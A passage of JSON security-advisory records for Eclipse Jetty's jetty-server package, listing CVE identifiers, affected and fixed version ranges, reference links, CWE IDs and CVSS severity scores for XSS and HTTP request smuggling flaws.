"https://lists.apache.org/thread.html/r05db8e0ef01e1280cc7543575ae0fa1c2b4d06a8b928916ef65dd2ad@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r03ca0b69db1e3e5f72fe484b71370d537cd711cbf334e2913332730a@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r002258611ed0c35b82b839d284b43db9dcdec120db8afc1c993137dc@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/eclipse/jetty.project" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r942f4a903d0abb25ac75c592e57df98dea51350e8589269a72fd7913@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r940f15db77a96f6aea92d830bc94d8d95f26cc593394d144755824da@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r90327f55db8f1d079f9a724aabf1f5eb3c00c1de49dc7fd04cad1ebc@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r83453ec252af729996476e5839d0b28f07294959d60fea1bd76f7d81@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r81748d56923882543f5be456043c67daef84d631cf54899082058ef1@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7c40fb3a66a39b6e6c83b0454bc6917ffe6c69e3131322be9c07a1da@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7bf7004c18c914fae3d5a6a0191d477e5b6408d95669b3afbf6efa36@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r780c3c210a05c5bf7b4671303f46afc3fe56758e92864e1a5f0590d0@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r769155244ca2da2948a44091bb3bb9a56e7e1c71ecc720b8ecf281f0@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r746434be6abff9ad321ff54ecae09e1f09c1c7c139021f40a5774090@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r72bf813ed4737196ea3ed26494e949577be587fd5939fe8be09907c7@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7189bf41cb0c483629917a01cf296f9fbdbda3987084595192e3845d@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r71031d0acb1de55c9ab32f4750c50ce2f28543252e887ca03bd5621e@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6f256a1d15505f79f4050a69bb8f27b34cb353604dd2f765c9da5df7@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ce2907b2691c025250ba010bc797677ef78d5994d08507a2e5477c9@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6b070441871a4e6ce8bb63e190c879bb60da7c5e15023de29ebd4f9f@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ac9e263129328c0db9940d72b4a6062e703c58918dd34bd22cdf8dd@%3Cissues.ignite.apache.org%3E" }, { "type": "WEB", 
"url": "https://lists.apache.org/thread.html/r694e57d74fcaa48818a03c282aecfa13ae68340c798dfcb55cb7acc7@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r65daad30d13f7c56eb5c3d7733ad8dddbf62c469175410777a78d812@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6535b2beddf0ed2d263ab64ff365a5f790df135a1a2f45786417adb7@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r64ff94118f6c80e6c085c6e2d51bbb490eaefad0642db8c936e4f0b7@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5f172f2dd8fb02f032ef4437218fd4f610605a3dd4f2a024c1e43b94@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5d1f16dca2e010193840068f1a1ec17b7015e91acc646607cbc0a4da@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5b3693da7ecb8a75c0e930b4ca26a5f97aa0207d9dae4aa8cc65fe6b@%3Cissues.ignite.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r56e5568ac73daedcb3b5affbb4b908999f03d3c1b1ada3920b01e959@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r520c56519b8820955a86966f499e7a0afcbcf669d6f7da59ef1eb155@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4b1fef117bccc7f5fd4c45fd2cabc26838df823fe5ca94bc42a4fd46@%3Cissues.ignite.apache.org%3E" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/04/20/3" } ], "database_specific": { "cwe_ids": [ "CWE-400", "CWE-551", "CWE-755" ], "github_reviewed": true, "github_reviewed_at": "2021-04-02T23:02:13Z", "nvd_published_at": "2021-04-01T15:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-5h9j-q6j2-253f", "published": 
"2019-12-02T18:13:28Z", "modified": "2024-02-16T08:16:10.159901Z", "aliases": [ "CVE-2019-17632" ], "summary": "Unescaped exception messages in error responses in Jetty", "details": "In Eclipse Jetty versions 9.4.21.v20190926, 9.4.22.v20191022, and 9.4.23.v20191118, the generation of default unhandled Error response content (in text/html and text/json Content-Type) does not escape Exception messages in stacktraces included in error output.", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.4.21.v20190926" }, { "fixed": "9.4.24.v20191120" } ] } ], "versions": [ "9.4.21.v20190926", "9.4.22.v20191022", "9.4.23.v20191118" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/12/GHSA-5h9j-q6j2-253f/GHSA-5h9j-q6j2-253f.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.4.22.v20191022" }, { "fixed": "9.4.24.v20191120" } ] } ], "versions": [ "9.4.22.v20191022", "9.4.23.v20191118" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/12/GHSA-5h9j-q6j2-253f/GHSA-5h9j-q6j2-253f.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.4.23.v20191118" }, { "fixed": "9.4.24.v20191120" } ] } ], "versions": [ "9.4.23.v20191118" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/12/GHSA-5h9j-q6j2-253f/GHSA-5h9j-q6j2-253f.json" } } ], "references": [ { "type": "ADVISORY", "url": 
"https://nvd.nist.gov/vuln/detail/CVE-2019-17632" }, { "type": "WEB", "url": "https://bugs.eclipse.org/bugs/show_bug.cgi?id=553443" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SAITZ27GKPD2CCNHGT2VBT4VWIBUJJNS" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2019-12-02T01:09:14Z", "nvd_published_at": "2019-11-25T22:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-6x9x-8qw9-9pp6", "published": "2018-10-19T16:16:38Z", "modified": "2024-02-16T08:16:22.832624Z", "aliases": [ "CVE-2017-7658" ], "summary": "Jetty vulnerable to authorization bypass due to inconsistent HTTP request handling (HTTP Request Smuggling)", "details": "Eclipse Jetty Server versions 9.2.x and older, 9.3.x (all non HTTP/1.x configurations), and 9.4.x (all HTTP/1.x configurations), are vulnerable to HTTP Request Smuggling when presented with two content-lengths headers, allowing authorization bypass. When presented with a content-length and a chunked encoding header, the content-length was ignored (as per RFC 2616). If an intermediary decides on the shorter length, but still passes on the longer body, then body content could be interpreted by Jetty as a pipelined request. 
If the intermediary is imposing authorization, the fake pipelined request bypasses that authorization.", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "9.2.25.v20180606" } ] } ], "versions": [ "7.0.0.M0", "7.0.0.M1", "7.0.0.M2", "7.0.0.M3", "7.0.0.M4", "7.0.0.RC0", "7.0.0.RC1", "7.0.0.RC2", "7.0.0.RC3", "7.0.0.RC4", "7.0.0.RC5", "7.0.0.RC6", "7.0.0.v20091005", "7.0.1.v20091125", "7.0.2.RC0", "7.0.2.v20100331", "7.1.0.RC0", "7.1.0.RC1", "7.1.0.v20100505", "7.1.1.v20100517", "7.1.2.v20100523", "7.1.3.v20100526", "7.1.4.v20100610", "7.1.5.v20100705", "7.1.6.v20100715", "7.2.0.RC0", "7.2.0.v20101020", "7.2.1.v20101111", "7.2.2.v20101205", "7.3.0.v20110203", "7.3.1.v20110307", "7.4.0.RC0", "7.4.0.v20110414", "7.4.1.v20110513", "7.4.2.v20110526", "7.4.3.v20110701", "7.4.4.v20110707", "7.4.5.v20110725", "7.5.0.RC0", "7.5.0.RC1", "7.5.0.RC2", "7.5.0.v20110901", "7.5.1.v20110908", "7.5.2.v20111006", "7.5.3.v20111011", "7.5.4.v20111024", "7.6.0.RC0", "7.6.0.RC1", "7.6.0.RC2", "7.6.0.RC3", "7.6.0.RC4", "7.6.0.RC5", "7.6.0.v20120127", "7.6.1.v20120215", "7.6.10.v20130312", "7.6.11.v20130520", "7.6.12.v20130726", "7.6.13.v20130916", "7.6.14.v20131031", "7.6.15.v20140411", "7.6.16.v20140903", "7.6.17.v20150415", "7.6.18.v20150929", "7.6.19.v20160209", "7.6.2.v20120308", "7.6.20.v20160902", "7.6.21.v20160908", "7.6.3.v20120416", "7.6.4.v20120524", "7.6.5.v20120716", "7.6.6.v20120903", "7.6.7.v20120910", "7.6.8.v20121106", "7.6.9.v20130131", "8.0.0.M0", "8.0.0.M1", "8.0.0.M2", "8.0.0.M3", "8.0.0.RC0", "8.0.0.v20110901", "8.0.1.v20110908", "8.0.2.v20111006", "8.0.3.v20111011", "8.0.4.v20111024", "8.1.0.RC0", "8.1.0.RC1", "8.1.0.RC2", "8.1.0.RC4", "8.1.0.RC5", "8.1.0.v20120127", "8.1.1.v20120215", "8.1.10.v20130312", "8.1.11.v20130520", "8.1.12.v20130726", "8.1.13.v20130916", "8.1.14.v20131031", 
"8.1.15.v20140411", "8.1.16.v20140903", "8.1.17.v20150415", "8.1.18.v20150929", "8.1.19.v20160209", "8.1.2.v20120308", "8.1.20.v20160902", "8.1.21.v20160908", "8.1.22.v20160922", "8.1.3.v20120416", "8.1.4.v20120524", "8.1.5.v20120716", "8.1.6.v20120903", "8.1.7.v20120910", "8.1.8.v20121106", "8.1.9.v20130131", "8.2.0.v20160908", "9.0.0.M0", "9.0.0.M1", "9.0.0.M2", "9.0.0.M3", "9.0.0.M4", "9.0.0.M5", "9.0.0.RC0", "9.0.0.RC1", "9.0.0.RC2", "9.0.0.v20130308", "9.0.1.v20130408", "9.0.2.v20130417", "9.0.3.v20130506", "9.0.4.v20130625", "9.0.5.v20130815", "9.0.6.v20130930", "9.0.7.v20131107", "9.1.0.M0", "9.1.0.RC0", "9.1.0.RC1", "9.1.0.RC2", "9.1.0.v20131115", "9.1.1.v20140108", "9.1.2.v20140210", "9.1.3.v20140225", "9.1.4.v20140401", "9.1.5.v20140505", "9.1.6.v20160112", "9.2.0.M0", "9.2.0.M1", "9.2.0.RC0", "9.2.0.v20140526", "9.2.1.v20140609", "9.2.10.v20150310", "9.2.11.M0", "9.2.11.v20150529", "9.2.12.M0", "9.2.12.v20150709", "9.2.13.v20150730", "9.2.14.v20151106", "9.2.15.v20160210", "9.2.16.v20160414", "9.2.17.v20160517", "9.2.18.v20160721", "9.2.19.v20160908", "9.2.2.v20140723", "9.2.20.v20161216", "9.2.21.v20170120", "9.2.22.v20170606", "9.2.23.v20171218", "9.2.24.v20180105", "9.2.3.v20140905", "9.2.4.v20141103", "9.2.5.v20141112", "9.2.6.v20141205", "9.2.7.v20150116", "9.2.8.v20150217", "9.2.9.v20150224" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-6x9x-8qw9-9pp6/GHSA-6x9x-8qw9-9pp6.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.3.0" }, { "fixed": "9.3.24.v20180605" } ] } ], "versions": [ "9.3.0.v20150612", "9.3.1.v20150714", "9.3.10.M0", "9.3.10.v20160621", "9.3.11.M0", "9.3.11.v20160721", "9.3.12.v20160915", "9.3.13.M0", "9.3.13.v20161014", "9.3.14.v20161028", "9.3.15.v20161220", "9.3.16.v20170120", "9.3.17.RC0", 
"9.3.17.v20170317", "9.3.18.v20170406", "9.3.19.v20170502", "9.3.2.v20150730", "9.3.20.v20170531", "9.3.21.M0", "9.3.21.RC0", "9.3.21.v20170918", "9.3.22.v20171030", "9.3.23.v20180228", "9.3.3.v20150827", "9.3.4.RC0", "9.3.4.RC1", "9.3.4.v20151007", "9.3.5.v20151012", "9.3.6.v20151106", "9.3.7.RC0", "9.3.7.RC1", "9.3.7.v20160115", "9.3.8.RC0", "9.3.8.v20160314", "9.3.9.M0", "9.3.9.M1", "9.3.9.v20160517" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-6x9x-8qw9-9pp6/GHSA-6x9x-8qw9-9pp6.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.4.0" }, { "fixed": "9.4.11.v20180605" } ] } ], "versions": [ "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.5.v20170502", "9.4.5.v20180619", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-6x9x-8qw9-9pp6/GHSA-6x9x-8qw9-9pp6.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-7658" }, { "type": "WEB", "url": "https://bugs.eclipse.org/bugs/show_bug.cgi?id=535669" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-6x9x-8qw9-9pp6" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/053d9ce4d579b02203db18545fee5e33f35f2932885459b74d1e4272@%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r41af10c4adec8d34a969abeb07fd0d6ad0c86768b751464f1cdd23e8@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9159c9e7ec9eac1613da2dbaddbc15691a13d4dbb2c8be974f42e6ae@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra6f956ed4ec2855583b2d0c8b4802b450f593d37b77509b48cd5d574@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20181014-0001" }, { "type": "WEB", "url": "https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US\u0026docId=emr_na-hpesbst03953en_us" }, { "type": "WEB", "url": "https://www.debian.org/security/2018/dsa-4278" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/106566" }, { "type": "WEB", "url": "http://www.securitytracker.com/id/1041194" } ], "database_specific": { "cwe_ids": [ "CWE-444" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:20:39Z", "nvd_published_at": "2018-06-26T17:29:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-7vx9-xjhr-rw6h", "published": 
"2019-04-23T16:06:02Z", "modified": "2024-02-16T08:16:44.502362Z", "aliases": [ "CVE-2019-10241" ], "summary": "Cross-site Scripting in Eclipse Jetty", "details": "In Eclipse Jetty version 9.2.26 and older, 9.3.25 and older, and 9.4.15 and older, the server is vulnerable to XSS conditions if a remote client USES a specially formatted URL against the DefaultServlet or ResourceHandler that is configured for showing a Listing of directory contents.", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "9.2.27.v20190403" } ] } ], "versions": [ "7.0.0.M0", "7.0.0.M1", "7.0.0.M2", "7.0.0.M3", "7.0.0.M4", "7.0.0.RC0", "7.0.0.RC1", "7.0.0.RC2", "7.0.0.RC3", "7.0.0.RC4", "7.0.0.RC5", "7.0.0.RC6", "7.0.0.v20091005", "7.0.1.v20091125", "7.0.2.RC0", "7.0.2.v20100331", "7.1.0.RC0", "7.1.0.RC1", "7.1.0.v20100505", "7.1.1.v20100517", "7.1.2.v20100523", "7.1.3.v20100526", "7.1.4.v20100610", "7.1.5.v20100705", "7.1.6.v20100715", "7.2.0.RC0", "7.2.0.v20101020", "7.2.1.v20101111", "7.2.2.v20101205", "7.3.0.v20110203", "7.3.1.v20110307", "7.4.0.RC0", "7.4.0.v20110414", "7.4.1.v20110513", "7.4.2.v20110526", "7.4.3.v20110701", "7.4.4.v20110707", "7.4.5.v20110725", "7.5.0.RC0", "7.5.0.RC1", "7.5.0.RC2", "7.5.0.v20110901", "7.5.1.v20110908", "7.5.2.v20111006", "7.5.3.v20111011", "7.5.4.v20111024", "7.6.0.RC0", "7.6.0.RC1", "7.6.0.RC2", "7.6.0.RC3", "7.6.0.RC4", "7.6.0.RC5", "7.6.0.v20120127", "7.6.1.v20120215", "7.6.10.v20130312", "7.6.11.v20130520", "7.6.12.v20130726", "7.6.13.v20130916", "7.6.14.v20131031", "7.6.15.v20140411", "7.6.16.v20140903", "7.6.17.v20150415", "7.6.18.v20150929", "7.6.19.v20160209", "7.6.2.v20120308", "7.6.20.v20160902", "7.6.21.v20160908", "7.6.3.v20120416", "7.6.4.v20120524", "7.6.5.v20120716", "7.6.6.v20120903", "7.6.7.v20120910", "7.6.8.v20121106", "7.6.9.v20130131", "8.0.0.M0", 
"8.0.0.M1", "8.0.0.M2", "8.0.0.M3", "8.0.0.RC0", "8.0.0.v20110901", "8.0.1.v20110908", "8.0.2.v20111006", "8.0.3.v20111011", "8.0.4.v20111024", "8.1.0.RC0", "8.1.0.RC1", "8.1.0.RC2", "8.1.0.RC4", "8.1.0.RC5", "8.1.0.v20120127", "8.1.1.v20120215", "8.1.10.v20130312", "8.1.11.v20130520", "8.1.12.v20130726", "8.1.13.v20130916", "8.1.14.v20131031", "8.1.15.v20140411", "8.1.16.v20140903", "8.1.17.v20150415", "8.1.18.v20150929", "8.1.19.v20160209", "8.1.2.v20120308", "8.1.20.v20160902", "8.1.21.v20160908", "8.1.22.v20160922", "8.1.3.v20120416", "8.1.4.v20120524", "8.1.5.v20120716", "8.1.6.v20120903", "8.1.7.v20120910", "8.1.8.v20121106", "8.1.9.v20130131", "8.2.0.v20160908", "9.0.0.M0", "9.0.0.M1", "9.0.0.M2", "9.0.0.M3", "9.0.0.M4", "9.0.0.M5", "9.0.0.RC0", "9.0.0.RC1", "9.0.0.RC2", "9.0.0.v20130308", "9.0.1.v20130408", "9.0.2.v20130417", "9.0.3.v20130506", "9.0.4.v20130625", "9.0.5.v20130815", "9.0.6.v20130930", "9.0.7.v20131107", "9.1.0.M0", "9.1.0.RC0", "9.1.0.RC1", "9.1.0.RC2", "9.1.0.v20131115", "9.1.1.v20140108", "9.1.2.v20140210", "9.1.3.v20140225", "9.1.4.v20140401", "9.1.5.v20140505", "9.1.6.v20160112", "9.2.0.M0", "9.2.0.M1", "9.2.0.RC0", "9.2.0.v20140526", "9.2.1.v20140609", "9.2.10.v20150310", "9.2.11.M0", "9.2.11.v20150529", "9.2.12.M0", "9.2.12.v20150709", "9.2.13.v20150730", "9.2.14.v20151106", "9.2.15.v20160210", "9.2.16.v20160414", "9.2.17.v20160517", "9.2.18.v20160721", "9.2.19.v20160908", "9.2.2.v20140723", "9.2.20.v20161216", "9.2.21.v20170120", "9.2.22.v20170606", "9.2.23.v20171218", "9.2.24.v20180105", "9.2.25.v20180606", "9.2.26.v20180806", "9.2.3.v20140905", "9.2.4.v20141103", "9.2.5.v20141112", "9.2.6.v20141205", "9.2.7.v20150116", "9.2.8.v20150217", "9.2.9.v20150224" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.2.26.v20180806", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-7vx9-xjhr-rw6h/GHSA-7vx9-xjhr-rw6h.json" } }, { "package": { "name": 
"org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.3.0" }, { "fixed": "9.3.26.v20190403" } ] } ], "versions": [ "9.3.0.v20150612", "9.3.1.v20150714", "9.3.10.M0", "9.3.10.v20160621", "9.3.11.M0", "9.3.11.v20160721", "9.3.12.v20160915", "9.3.13.M0", "9.3.13.v20161014", "9.3.14.v20161028", "9.3.15.v20161220", "9.3.16.v20170120", "9.3.17.RC0", "9.3.17.v20170317", "9.3.18.v20170406", "9.3.19.v20170502", "9.3.2.v20150730", "9.3.20.v20170531", "9.3.21.M0", "9.3.21.RC0", "9.3.21.v20170918", "9.3.22.v20171030", "9.3.23.v20180228", "9.3.24.v20180605", "9.3.25.v20180904", "9.3.3.v20150827", "9.3.4.RC0", "9.3.4.RC1", "9.3.4.v20151007", "9.3.5.v20151012", "9.3.6.v20151106", "9.3.7.RC0", "9.3.7.RC1", "9.3.7.v20160115", "9.3.8.RC0", "9.3.8.v20160314", "9.3.9.M0", "9.3.9.M1", "9.3.9.v20160517" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.3.25.v20180904", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-7vx9-xjhr-rw6h/GHSA-7vx9-xjhr-rw6h.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.4.0" }, { "fixed": "9.4.16.v20190411" } ] } ], "versions": [ "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.11.v20180605", "9.4.12.RC0", "9.4.12.RC1", "9.4.12.RC2", "9.4.12.v20180830", "9.4.13.v20181111", "9.4.14.v20181114", "9.4.15.v20190215", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.5.v20170502", "9.4.5.v20180619", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], 
"database_specific": { "last_known_affected_version_range": "\u003c= 9.4.15.v20190215", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-7vx9-xjhr-rw6h/GHSA-7vx9-xjhr-rw6h.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10241" }, { "type": "WEB", "url": "https://bugs.eclipse.org/bugs/show_bug.cgi?id=546121" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/01e004c3f7c7365863a27e7038b7f32dae56ccf3a496b277c9b7f7b6@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/053d9ce4d579b02203db18545fee5e33f35f2932885459b74d1e4272@%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/464892b514c029dfc0c8656a93e1c0de983c473df70fdadbd224e09f@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/8bff534863c7aaf09bb17c3d0532777258dd3a5c7ddda34198cc2742@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ac51944aef91dd5006b8510b0bef337adaccfe962fb90e7af9c22db4@%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/bcfb37bfba7b3d7e9c7808b5e5a38a98d6bb714d52cf5162bdd48e32@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/d7c4a664a34853f57c2163ab562f39802df5cf809523ea40c97289c1@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/05/msg00016.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190509-0003" }, { "type": "WEB", "url": 
"https://www.debian.org/security/2021/dsa-4949" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2019-04-23T16:02:04Z", "nvd_published_at": "2019-04-22T20:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-84q7-p226-4x5w", "published": "2018-10-19T16:16:27Z", "modified": "2024-02-16T08:17:36.036350Z", "aliases": [ "CVE-2017-7656" ], "summary": "Jetty vulnerable to cache poisoning due to inconsistent HTTP request handling (HTTP Request Smuggling)", "details": "Eclipse Jetty, versions 9.2.x and older, 9.3.x (all configurations), and 9.4.x (non-default configuration with RFC2616 compliance enabled), contain an HTTP Request Smuggling Vulnerability that can result in cache poisoning.", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "9.3.24.v20180605" } ] } ], "versions": [ "7.0.0.M0", "7.0.0.M1", "7.0.0.M2", "7.0.0.M3", "7.0.0.M4", "7.0.0.RC0", "7.0.0.RC1", "7.0.0.RC2", "7.0.0.RC3", "7.0.0.RC4", 